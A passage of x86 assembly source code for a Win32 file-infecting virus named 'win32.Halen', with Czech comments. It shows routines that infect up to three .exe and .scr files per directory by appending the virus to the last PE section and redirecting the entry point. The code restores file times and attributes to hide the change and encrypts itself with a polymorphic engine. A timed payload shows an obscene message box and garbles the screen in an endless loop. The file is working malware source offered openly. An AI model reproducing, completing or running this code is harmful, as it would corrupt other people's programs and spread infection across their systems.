call ISCh ;Zmenit adresar & infikovat
call [ebp+offset SetCurrentDirectoryAVA] ;Vratime puvodni adresar
call ISCurr ;A infikujem soubory v nem
jmp Return2Host ;Navrat do hostitele
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű INFEKCE ADRESARE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
ISCh:
push 128h ;Maximalni delka
push ebx ;VA nazvu adresare
call eax ;Zjistit nazev (viz vyse)
push ebx ;
call [ebp+offset SetCurrentDirectoryAVA] ;Zmenit adresar
ISCurr: ;
push ebx ;Uschovat pointer na nazev adresare
lea esi,[ebp+offset exeMask] ;Soubory *.EXE
call InfectCurrDir ;Infikuj aktualni adresar
lea esi,[ebp+offset scrMask] ;Soubory *.SCR
call InfectCurrDir ;Infikuj aktualni adresar
pop ebx ;Vytahnout pointer
ret ;Hotovka
InfectCurrDir: ;
mov byte ptr [ebp+offset infCounter],3h ;Nastavit pocitadlo souboru
lea eax,[ebp+offset FSearch] ;EAX=offset Search record
push eax ;
push esi ;
call [ebp+offset FindFirstFileAVA] ;Najit prvni odpovidajici soubor
inc eax ;Chyba ?
jz ICD01 ;
dec eax ;Ne
mov edx,eax ;Ulozit Handle
ICD00: ;
test eax,eax ;Nalezen soubor?
jz ICD01 ;Ne -> konec
xchg eax,edx ;Uschovat Handle
lea esi,[ebp+offset FSearch.FName] ;
push eax ;Uschovat registry
push esi ;
call InfectFile ;Infikovat nalezenej soubor
pop edi ;Obnovit registry
pop eax ;
test esi,esi ;Je pocitadlo nulovy? (viz nize)
jz ICD01 ;yo -> konec
push eax ;Uschovat handle
lea ebx,[ebp+offset FSearch] ;
push ebx ;
push eax ;
call [ebp+offset FindNextFileAVA] ;Najit dalsi soubor
pop edx ;Obnovit handle
jmp ICD00 ;A zas od zacatku!
ICD01: ;
ret ;Infekce adresare hotova!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű INFIKACE SOUBORU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
InfectFile: ;
mov eax,[ebp+offset FSearch.FSizeL] ;Zkontrolujem velikost souboru
cmp eax,4096 ;
jb InfError ;Mensi nez 4096B -> konec
cmp eax,5000000 ;
ja InfError ;Vetsi nez cca 5MB -> konec
push 00000080h ;80h='any file' atribut
push esi ;ESI=VA na jmeno souboru
call [ebp+offset SetFileAttributesAVA] ;Nastavit atributy souboru
inc eax ;
jz InfError ;Chyba?
xor eax,eax ;EAX=0
push eax ;Template handle (vzdy 0)
push eax ;Atributy
push 00000003h ;Open type (3 pro existujici soubor)
push eax ;Security option
inc eax ;
push eax ;Sharing mode (vzdy 1)
push 0C0000000h ;Access mode (80000000+40000000)
push esi ;^(generic read/write)^
call [ebp+offset CreateFileAVA] ;Otevrit soubor
inc eax ;
jz RetAttr ;Chyba?
dec eax ;EAX=Handle otevrenyho souboru
mov [ebp+offset IFHandle],eax ;Ulozit
mov ecx,VirSize ;ECX=Delka viru (vcetne dat)
add ecx,[ebp+offset FSearch.FSizeL] ;ECX=ECX+delka souboru
add ecx,1000h ;plus nejaky misto :)
mov [ebp+offset mapMem],ecx ;Ulozit
xor eax,eax ;
push eax ;Filename handle (vzdy 0)
push ecx ;Maximum size (ECX)
push eax ;Minimum size (0)
push 00000004h ;Page access rights (4 pro R/W)
push eax ;Security attributes (vzdy 0)
push dword ptr [ebp+offset IFHandle] ;Handle otevrenyho souboru
call [ebp+offset CreateFileMappingAVA] ;Alokovat pamet
cmp eax,0 ;Nezadarilo se?
je RetAttr ;
mov [ebp+offset IMHandle],eax ;Ulozit map handle
push dword ptr [ebp+offset mapMem] ;Kolik mapovat
push 00000000h ;File offset high (0) \ kam mapovat
push 00000000h ;File offset low (0) /
push 00000002h ;Map access mode (2 pro write)
push eax ;Map handle
call [ebp+offset MapViewOfFileVA] ;Zavolat API
cmp eax,0 ;Vloudila se chybicka?
je CloseMap ;
xchg esi,eax ;ESI=adresa kam se to namapovalo
lodsw ;EAX=prvni 2 byty souboru
sub esi,2 ;Vratime ESI do puvodniho stavu
mov [ebp+offset mapView],esi ;Uschovat adresu
cmp ax,'ZM' ;MZ signatura
jne UnmapView ;Ne -> neni to EXE -> pryc!
mov eax,esi ;
add esi,[esi+3ch] ;Posunem se na zacatek PE hlavicky
push esi ;Schovat
sub esi,eax ;
cmp esi,[ebp+FSearch.FSizeL] ;Ukazuje ESI mimo rozsah souboru?
pop esi ;Obnovit
ja UnmapView ;yo -> pryc!!!
cmp word ptr [esi],'EP' ;Je to PE?
jne UnmapView ;Ne -> shit!
cmp dword ptr [esi+4ch],'NLAH' ;Znacka zavirovaneho souboru
je UnmapView ;Uz je zavirovan -> pryc
mov eax,[esi+28h] ;
mov [ebp+offset origIP],eax ;Uschovat originalni IP
mov eax,[esi+3ch] ;
mov [ebp+offset fileAlign],eax ;A taky FileAlign
mov ebx,[esi+74h] ;EBX=pocet zaznamu v DataDir. array
shl ebx,3 ;EBX=EBX*8
movzx ecx,word ptr [esi+6h] ;ECX=pocet sekci v PE souboru
dec ecx ;Jednu odectem
mov eax,28h ;
mul ecx ;EAX=EAX*ECX
add eax,ebx ;
add eax,78h ;78h je konec PE hlavicky
add eax,esi ;EDI ted ukazuje na Section header
xchg eax,edi ;posledni sekce
mov ecx,[ebp+offset FSearch.FSizeL] ;ECX=delka souboru
mov ebx,[edi+14h] ;EDX=offset dat posledni sekce
sub ecx,ebx ;ECX-EDX (velikost sekce)
cmp ecx,[edi+8h] ;Porovnat s velikosti v headeru
jb IGoOn ;Je mensi -> OK
mov [edi+8h],ecx ;Vetsi -> upravime
add [esi+1ch],ecx ;Upravit Size of code
add [esi+50h],ecx ;Upravit Image size
IGoOn: ;
mov dword ptr [esi+4ch],'NLAH' ;Nastavit znacku
or [edi+24h],0A0000020h ;Nastavime flags sekce (R/W/Code)
mov eax,[edi+8h] ;EAX=virtualni velikost sekce
push eax ;Uschovat
add eax,VirSize ;EAX=EAX+delka viru vcetne dat
mov ebx,[ebp+offset fileAlign] ;EBX=File align
push eax ;Uschovat
div ebx ;EAX=EAX DIV EBX, EDX=EAX MOD EBX
pop eax ;Obnovit
sub ebx,edx ;FileAlign-EDX
mov [edi+8h],eax ;Nova Virtual size
add eax,ebx ;
mov [edi+10h],eax ;Nova Size of Raw Data
pop eax ;Obnovit
mov ebx,[edi+0ch] ;EBX=Virtual address
add ebx,eax ;EBX=EBX+stara virtualni velikost
mov [esi+28h],ebx ;Ulozit novou vstupni IP
mov edx,[ebp+offset origIP] ;EDX=originalni vstupni IP
sub ebx,edx ;EBX=rozdil mezi starou a novou IP
mov [ebp+offset origIP],ebx ;Ulozit
mov ecx,VirSize ;ECX=delka viru
add ecx,255 ;Plus nejaky misto
add [esi+50h],ecx ;Pridat k Image size
add [esi+1ch],ecx ;Pridat k Size of code
mov edx,[edi+14h] ;EDX=ukazatel na data sekce (v souboru)
add edx,eax ;(EAX=puvodni virt. velikost sekce)
add edx,[ebp+offset mapView] ;EDX=EDX+VA zacatku obrazu souboru
xchg edi,edx ;EDI<->EDX ;)
lea esi,[ebp+Start] ;ESI=VA zacatku tela viru
mov ecx,offset CodeEnd-offset Start ;ECX=delka viru (bez datovyho prostoru)
call EncryptVirus ;Zakodovat a zkopirovat telo
dec edi ;
sub edi,[ebp+offset mapView] ;EDI=EDI-VA zacatku obrazu souboru
mov [ebp+offset FSearch.FSizeL],edi ;Ulozit novou delku souboru
dec byte ptr [ebp+offset infCounter] ;Snizit pocitadlo infekce
jnz UnmapView ;Pokud neni nula jdeme dal
xor esi,esi ;Jinak ESI=0
UnmapView: ;
push dword ptr [ebp+offset mapView] ;VA obrazu souboru v pameti
call [ebp+offset UnmapViewOfFileVA] ;
CloseMap: ;
push dword ptr [ebp+offset IMHandle] ;
call [ebp+offset CloseHandleVA] ;Uzavreme map handle
RetTime: ;
lea eax,[ebp+offset FSearch.CrTime] ;EAX=VA puvidniho casu souboru
push eax ;Creation time
add eax,16 ;
push eax ;Last write time
sub eax,8 ;
push eax ;Last access time
push dword ptr [ebp+IFHandle] ;Handle souboru
call [ebp+offset SetFileTimeVA] ;Nastavime puvodni casy
xor eax,eax ;
push eax ;How2Move=0 (Od zacatku souboru)
push eax ;Vzdalenost high (vzdy 0)
push dword ptr [ebp+offset FSearch.FSizeL] ;Vzdalenost low
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset SetFilePointerVA] ;Nastavime ukazatel souboru
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset SetEndOfFileVA] ;Uriznem soubor
push dword ptr [ebp+offset IFHandle] ;Handle souboru
call [ebp+offset CloseHandleVA] ;Zavrem soubor
RetAttr: ;
push dword ptr [ebp+offset FSearch.FAttr] ;VA atributu souboru
lea eax,[ebp+offset FSearch.FName] ;EAX=VA jmena souboru
push eax ;
call [ebp+offset SetFileAttributesAVA] ;Nastavit puvodni atributy
InfError: ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű KODOVANI VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
EncryptVirus: ;
push esi ;Uschovat registry
push edi ;
push ecx ;
lea eax,[ebp+offset CryptData] ;EAX=VA pole dat
call BuildCryptData ;Vytvorime data pro de/en krypt. rutinu
xor ebx,ebx ;EBX=0
mov bl,[ebp+offset CryptSize] ;Pocet instrukci v crypt rutine
add ebx,36 ;Plus nejaky init instrukce
add [ebp+offset origIP],ebx ;Upravime rozdil IP
mov edi,[esp+4] ;Obnovime ulozeny EDI
mov ebx,offset CodeEnd-offset Start+1 ;EBX=kolik toho budem kodovat
xor edx,edx ;
inc edx ;EDX=1 (encrypt)
call CreateCrypt ;Vytvorit encrypt rutinu (na VA EDI)
pop ecx ;Obnovit registry
pop edi ;
pop esi ;
shr ecx,2 ;ECX=ECX DIV 4 (kodujem po DWORDech)
inc ecx ;+1
push edi ;Schovat EDI
xor ebx,ebx ;
mov bl,byte ptr [ebp+offset CryptSize] ;EBX=Delka vsech kodovacich instrukci
add ebx,36 ;Plus init instrukce
push edi ;Schovat
add edi,ebx ;EDI=EDI+EBX (tam budem ukladat
pop ebx ;zakodovana data)
EV00: lodsd ;EAX=data k zakodovani
push ebx ;Uschovat registry
push ecx ;
call ebx ;Zavolat vytvorenou kodovaci rutinu
pop ecx ;EAX=zakodovana data
pop ebx ;Obnovit registry
stosd ;Ulozit EAX
dec ecx ;Snizit pocitadlo
jnz EV00 ;Hotovo?
pop eax ;EAX=puvodni EDI (kam sme zacali ukladat)
push edi ;Uschovat EDI (konec zak. tela)
xchg eax,edi ;Prohodit
mov ebx,offset CodeEnd-offset Start+1 ;EBX=code size
xor edx,edx ;EDX=0 (decrypt)
call CreateCrypt ;Vytvorit decrypt rutinu (na VA EDI)
pop edi ;Obnovit EDI
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI DE/ENCRYPT RUTIN Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
CreateCrypt: ;EDX=0 pro decrypt, 1 pro encrypt
push ebx ;Schovat (EBX=kolik bytu de/kodujem)
lea esi,[ebp+offset CryptData] ;ESI=VA nagenerovanych dat
mov ebx,1 ;Nastavime pocitadlo
test edx,edx ;Decrypt ?
jnz CC00 ;Ne -> pokracujem na CC00
lea esi,[ebp+offset DecryptStart] ;yo -> zkopirujem init instrukce
movsd ;Pretahnout 2xDWORD
movsd ;
xor eax,eax ;
mov al,byte ptr [ebp+offset CryptSize] ;EAX=delka vsech de/encrypt intrukci
add eax,31 ;Plus delka init instrukci
stosd ;Ulozime pozici odkud se dekoduje
movsd ;A pretahnem zbytek init instrukci
movsw ;
mov bl,byte ptr [ebp+offset CryptNr] ;Nastavime pocitadlo
call NI ;Nastav ESI na posledni crypt instr.
add esi,3h ;Pridej jeji delku
add esi,ecx ; -||-
CC00: movsw ;Pretahni pocatecni nebo
CC01: ;koncovy XCHG (zalezi na EDX)
call NI ;Nastav ESI na BLtou crypt instr.
movsb ;Pretahni prvni byte instrukce
add esi,edx ;Encrypt nebo decrypt registr
movsb ;Pretahni ho
test edx,edx ;Pokud tvorime decrypt musime
jnz CC06 ;upravit ESI
inc esi ;!!! V ECX je delka instrukce-2!!!
CC06: movsb ;Pretahni dalsi byte instrukce
dec ecx ;Zkopirovano vse?
jnz CC06 ;Ne -> val dal
test edx,edx ;Decrypt?
jnz CC02 ;Nee -> CC02
dec bl ;Sniz pocitadlo
jz CC05 ;Vsechny instr. zkopirovany?
jmp CC01 ;ne -> Opakujem pro dalsi instr.
CC02: inc bl ;Zvys pocitadlo
cmp bl,byte ptr [ebp+offset CryptNr] ;Vsechny instr. zkopirovany?
ja CC05 ;yo -> konec
jmp CC01 ;ne -> opakujem
CC05: ;
pop eax ;Obnov (push EBX na zacatku)
test edx,edx ;Decrypt?
jnz CC03 ;Ne -> zkopiruj RET a konec
lea esi,[ebp+offset CryptData] ;Zkopiruj XCHG
movsw ;
lea esi,[ebp+offset DecryptEnd] ;Zkopiruj koncove instrukce (CMP)
movsd ;
shr eax,2 ;EAX=EAX DIV 4
inc eax ;+1
stosd ;Uloz hodnotu k CMP
movsw ;Pretahni intr. JNE
mov eax,0FFFFFFFAh ;
xor ebx,ebx ;
mov bl,byte ptr [ebp+offset CryptSize] ;EBX=delka crypt instrukci
add ebx,13 ;Plus init
sub eax,ebx ;Vypocet skoku JNE
stosd ;Uloz to
jmp CC04 ;Hotovo
CC03: mov bl,byte ptr [ebp+offset CryptNr] ;Pro encrypt prethnem jen XCHG
call NI ;Nastav ESI na posledni istrukci
add esi,3h ;
add esi,ecx ;Posun ESI za ni
movsw ;Pretahni ten XCHG
mov eax,0c3h ;EAX=0C3h (RET)
stosb ;Uloz
CC04: ret ;Hotovo
NI: ;
push eax ;Neznicit EAX!
lea esi,[ebp+offset CryptData+2] ;Nastav ESI na 1. istrukci
xor bh,bh ;Nuluj pocitadlo
NI00: ;
xor ecx,ecx ;ECX=0 ;)
lodsb ;AL=1 byte instrukce
cmp al,81h ;Je to 6 bytova instrukce?
jne NI01 ;
add esi,3h ;ESI=ESI+3
add ecx,3h ;ECX=3
NI01: add esi,3h ;ESI=ESI+3
add ecx,1h ;ECX=ECX+1
inc bh ;Zvys pocitadlo
cmp bh,bl ;Hledana instrukce?
jne NI00 ;Ne -> opakuj!
NI02: sub esi,ecx ;Nastav ESI na zac. instrukce
sub esi,3h ;
pop eax ;Obnov EAX
ret ;Zpet!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI DAT PRO DE/ENCRYPT RUTINY Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
BuildCryptData:
mov byte ptr [ebp+offset CryptNr],0 ;Nuluj fsechna pocitadla!!! ;)
mov byte ptr [ebp+offset CryptSize],0 ;
call [ebp+offset GetTickCountVA] ;Init nahodnejch cisel
xor eax,65432h ;
mov [ebp+offset RandomNr],eax ;
call Random ;Furt init
lea edi,[ebp+offset CryptData] ;EDI=pocatek pole crypt dat
mov eax,4h ;Vygeneruj nahodny cislo
call Random ;mensi nez EAX
mov ebx,eax ;EBX=EAX (pracovni registr)
mov eax,87h ;Instrukce XCHG EAX,prac.reg.
stosb ;
mov eax,0c0h ;
add eax,ebx ;
stosb ;Az sem
mov eax,100 ;Zvol nahodnou delku rutiny
call Random ;
mov [ebp+offset CDRandom],eax ;a uloz ji
BCD00: ;
mov eax,6h ;Nahodne zvol instrukci
call Random ;
cmp eax,0 ;Je to XCHG ?
jnz BCD01 ;Ne -> jdi dal
mov eax,87h ;
stosb ;Uloz 1. byte (87h)
mov eax,4h ;Musime zmenit prac. registr
call Random ;Nahodne zvolime
push eax ;Uschovat
mov ecx,8 ;
mul ecx ;EAX=EAX*8
add eax,0C0h ;
add eax,ebx ;Plus puvodni
pop ebx ;EBX=novy prac. registr
stosb ;Uloz vypocitanou hodnotu (decrypt)
stosb ;Pro encrypt je stejna
mov eax,90h ;
stosb ;Dopln na 3 bytovou instrukci (NOP)
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
jmp BCD04 ;
BCD01: ;
cmp eax,3h ;Je to ADD, SUB nebo XOR?
ja BCD03 ;Ne -> jdi dal
push eax ;Schovat
mov eax,3h ;
call Random ;Zvol zpusob operace
mov ecx,eax ;Schovat do ECX !!!!!
add eax,81h ;Pricti zaklad
stosb ;Uloz 1. byte instrukce
pop eax ;Obnovit EAX (typ instrukce)
dec eax ;-1
jz BCD05 ;Je to ADD?
std ;Ne -> STD
cmp eax,2 ;Je to XOR?
jne BCD06 ;Ne -> jdi dal
BCD05: cld ;Pro XOR nebo ADD
BCD06:
lea esi,[ebp+offset ASXInstr] ;ESI=tabulka zakladu registru
add esi,eax ;ESI=ESI+typ instrukce (0 az 2)
lodsb ;Natahni pro decrypt
xchg eax,edx ;EDX<->EAX
lodsb ;Natahni pro encrypt
cld ;Vrat zpet smer
add eax,ebx ;Prictem prac. reg.
stosb ;Ulozime pro decrypt
xchg eax,edx ;EDX<->EAX ;)
add eax,ebx ;Prictem prac. reg.
stosb ;Ulozime pro encrypt
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
test ecx,ecx ;Je to 6 bytova instr. (ECX viz nahore)
jnz BCD02 ;Ne -> preskoc
mov eax,0FFFFFFFFh ;Vygenerujem 4 bytovou hodnotu
call Random ;
stosd ;A ulozime
add byte ptr [ebp+offset CryptSize],3h ;Zvysit pocitadlo
jmp BCD04 ;JMP!
BCD02: mov eax,0100h ;Vygen. 1 bytovou hodnotu
call Random ;
stosb ;Ulozit
jmp BCD04 ;JMP! :)
ASXInstr: db 0C0h,0E8h,0F0h,0F0h ;Tabula zakladu registru pro instr. ADD, SUB, XOR, XOR
BCD03:
push eax ;Instrukce ROR nebo ROL
mov eax,2h ;
call Random ;Nahodna hodnota
add eax,0C0h ;1. byte instrukce
stosb ;Ulozit
pop eax ;Obnovit EAX (typ instrukce)
xchg eax,ecx ;EAX<->ECX
mov eax,0c0h ;Zaklad pro decrypt
mov edx,0c8h ;Zaklad pro encrypt
add eax,ebx ;+ prac. reg.
add edx,ebx ;+ prac. reg.
sub ecx,4 ;ECX-4
jz BCD07 ;Je to ROL?
xchg eax,edx ;Ne -> prohod EAX<->EDX
BCD07: stosb ;Uloz hodnotu pro decrypt
xchg eax,edx ;EAX<->EDX
stosb ;Uloz hodnotu pro encrypt
mov eax,100h ;
call Random ;Nahodna hodnota
stosb ;Ulozit
add byte ptr [ebp+offset CryptSize],3h ;Zvys pocitadlo
BCD04: ;
inc byte ptr [ebp+offset CryptNr] ;Zvys pocitadlo poctu instrukci
lea eax,[ebp+offset CryptData+212] ;EAX=maximalni delka instrukci
sub eax,[ebp+offset CDRandom] ;Odecteme (vygenerovano vyse)
cmp edi,eax ;Jsme na konci?
jb BCD00 ;Ne -> vygeneruj dalsi instrukci
mov eax,87h ;Konec -> umistime XCHG
stosb ;1. byte
mov eax,8h ;
mul ebx ;EAX=EAX*prac.reg.
add eax,0c0h ;EAX+0C0h
stosb ;Ulozit
ret ;Hotovo!
CDRandom: dd ?
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű GENEROVANI NAHODNYCH CISEL - VERY STUPID CODE Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
Random: ;Tohle je generator nah. cisel
push edx ;Je tak debilni, ze to ani nebudu
push ecx ;komentovat
xchg eax,ecx ;Vstup: EAX=cislo
mov eax,[ebp+offset RandomNr] ;Vystup: EAX=nah. cislo mensi nez
mov edx,87654321h ; vstupni EAX a vetsi nez 0
mul edx ;
xor eax,12345678h ;
mov [ebp+offset RandomNr],eax ;
mov edx,eax ;
rol edx,8 ;
push eax ;
jmp Rnd01 ;
Rnd00: pop eax ;
shr eax,1 ;
shr edx,1 ;
xor eax,edx ;
push eax ;
and eax,edx ;
test eax,eax ;
jz Rnd01 ;
dec eax ;
Rnd01: cmp eax,ecx ;
jae Rnd00 ;
pop ecx ;
pop ecx ;
pop edx ;
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű !!!!!!!!! PAYLOAD !!!!!!!! Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
PayLoad: ;Payload (moje oblibena cast)
lea eax,[ebp+offset FSearch] ;Data budeme ukladat do Search recordu
push eax ;protoze uz ho nepotrebujem
push eax ;
call [ebp+offset GetSystemTimeVA] ;Zjistime systemovy cas
pop esi ;ESI=VA FSearch
cmp word ptr [esi+4],06 ;Sobota?
jne NoPL ;Ne -> :(
cmp word ptr [esi+8],19 ;19 hod. ?
jne NoPL ;Ne -> :(
lea eax,[ebp+offset gdi] ;
push eax ;VA jmena knihovny
call [ebp+offset LoadLibraryAVA] ;Natahneme knihovnu gdi32.dll
xchg eax,edx ;EDX=VA knihovny v pameti
lea esi,[ebp+offset BitBltS] ;ESI=VA prvniho API nazvu
call FindPLAPIs ;Najdi adresu API funkci
lea eax,[ebp+offset user32] ;VA jmena knihovny
push eax ;
call [ebp+offset LoadLibraryAVA] ;Natahni knihovnu user32.dll
xchg eax,edx ;EDX=VA knihovny
lea esi,[ebp+offset MsgBoxAS] ;
call FindPLAPIs ;Najdem API adresy
push 1000h ;Typ okna
lea eax,[ebp+offset plTitle] ;
push eax ;Titulek okna
lea eax,[ebp+offset plText] ;
push eax ;Text okna
push 0h ;Vzdy 0h
call [ebp+offset MsgBoxAVA] ;Ukaz Dialog
push 0h ;
call [ebp+offset GetDCVA] ;Handle obrazovky
xchg eax,edx ;EDX=Handle
PLSt: xor ebx,ebx ;EBX=0h (radek)
mov ecx,0000FFh ;Cervena barva
PL00: call SetPix ;Nastav pixel
inc ebx ;Na dalsi radek
dec ecx ;Zmen barvu (od cervene k cerne)
jnz PL00 ;Cerna?
PL01: call SetPix ;Nastav pixel
inc ebx ;Dalsi radek
cmp ebx,800h ;Konec obrazovky?
jne PL01 ;Ne -> opakuj
xor ebx,ebx ;
PL02: xor eax,eax ;Sloupec 0
mov ebx,1 ;Na sloupec 1
push edx ;Uschovat handle
call MoveScr ;Posun obrazovku
pop edx ;Obnov handle
jmp PLSt ;Opakuj do zblbnuti!
NoPL: ret ;Navrat (spatny datum/cas)
FindPLAPIs:
xor eax,eax ;EAX=0 ;)
lodsb ;AL=delka nazvu API funkce
cmp al,0h ;Konec seznamu?
je FPLAOK ;yo -> hotovka
push eax ;Uschovat
push edx ;
push esi ;VA nazvu
push edx ;VA modulu (knihovny)
call [ebp+offset GetProcAddressVA] ;Zjisti VA API
pop edx ;Obnov vsechno
pop ebx ;
add esi,ebx ;Posunout za nazev
mov edi,esi ;EDI=ESI
stosd ;Ulozit VA
mov esi,edi ;ESI=EDI
jmp FindPLAPIs ;Opakuj pro dalsi nazev
FPLAOK: ret ;Hotovo!
MoveScr: push ebx ;Uschovat EBX
push 00CC0020h ;Zpusob kopirovani
push 0h ;Radek odkud
push eax ;Sloupec odkud
push edx ;Handle odkud
push 800h ;Vyska
push 800h ;Sirka
push 0h ;Handle kam
push ebx ;Radek kam
push edx ;Sloupec kam
call [ebp+offset BitBltVA] ;Posun ten kus obrazu!
pop ebx ;Obnovit
ret ;Zpet!
SetPix: push ecx ;Uschovat souradnice
push edx ;
push ecx ;Barva
push ebx ;Radek
push 0h ;Sloupec
push edx ;Handle
call [ebp+offset SetPixelVA] ;Nastav pixel
pop edx ;Obnov souradnice
pop ecx ;
ret ;Hotovo!
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű DATA Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
plTitle db 'win32.Halen',0h
plText db '..::|| Your system was fucked by win32.Halen. Written by pxR[MIONS] ||::..',0h
CryptSize db ?
CryptNr db ?
RandomNr: dd ?
DecryptStart: db 0e8h,0h,0h,0h,0h,05fh,081h,0c7h,08bh,0f7h,033h,0edh,0fch,0adh
DecryptEnd: db 0abh,45h,081h,0FDh,0fh,85h,00,00,00,00
VirSize equ offset VirusEnd-offset Start+1
DataSize equ offset VirusEnd-offset CodeEnd+1
if debug
testFName db 'test.exe',0h
endif
exeMask db '*.exe',0h
scrMask db '*.scr',0h
origIP dd ?
APITableStr:
GetFileAttributesAS db 19,'GetFileAttributesA',0h
SetFileAttributesAS db 19,'SetFileAttributesA',0h
CreateFileAS db 12,'CreateFileA',0h
GetFileTimeS db 12,'GetFileTime',0h
CreateFileMappingAS db 19,'CreateFileMappingA',0h
MapViewOfFileS db 14,'MapViewOfFile',0h
UnmapViewOfFileS db 16,'UnmapViewOfFile',0h
CloseHandleS db 12,'CloseHandle',0h
SetFilePointerS db 15,'SetFilePointer',0h
SetEndOfFileS db 13,'SetEndOfFile',0h
SetFileTimeS db 12,'SetFileTime',0h
ExitProcessS db 12,'ExitProcess',0h
FindFirstFileAS db 15,'FindFirstFileA',0h
FindNextFileAS db 14,'FindNextFileA',0h
GetWindowsDirectoryAS db 21,'GetWindowsDirectoryA',0
GetSystemDirectoryAS db 20,'GetSystemDirectoryA',0
GetCurrentDirectoryAS db 21,'GetCurrentDirectoryA',0
SetCurrentDirectoryAS db 21,'SetCurrentDirectoryA',0
GetTickCountS db 13,'GetTickCount',0
LoadLibraryAS db 13,'LoadLibraryA',0
GetSystemTimeS db 14,'GetSystemTime',0
GetProcAddressS db 15,'GetProcAddress',0
db 0h
gdi: db 'gdi32.dll',0h
user32: db 'user32.dll',0h
BitBltS db 7,'BitBlt',0h
BitBltVA dd ?
SetPixelS db 9,'SetPixel',0h
SetPixelVA dd ?
db 0h
MsgBoxAS db 12,'MessageBoxA',0h
MsgBoxAVA dd ?
GetDCS db 6,'GetDC',0h
GetDCVA dd ?
db 0h
db 0h,0h,0h,0h
CodeEnd:
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű KONEC KODU NASLEDUJICI DATA SE UZ NEKOPIRUJI S TELEM VIRU Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
CryptData db 214 dup (0h)
APITableVA:
GetFileAttributesAVA dd ?
SetFileAttributesAVA dd ?
CreateFileAVA dd ?
GetFileTimeVA dd ?
CreateFileMappingAVA dd ?
MapViewOfFileVA dd ?
UnmapViewOfFileVA dd ?
CloseHandleVA dd ?
SetFilePointerVA dd ?
SetEndOfFileVA dd ?
SetFileTimeVA dd ?
ExitProcessVA dd ?
FindFirstFileAVA dd ?
FindNextFileAVA dd ?
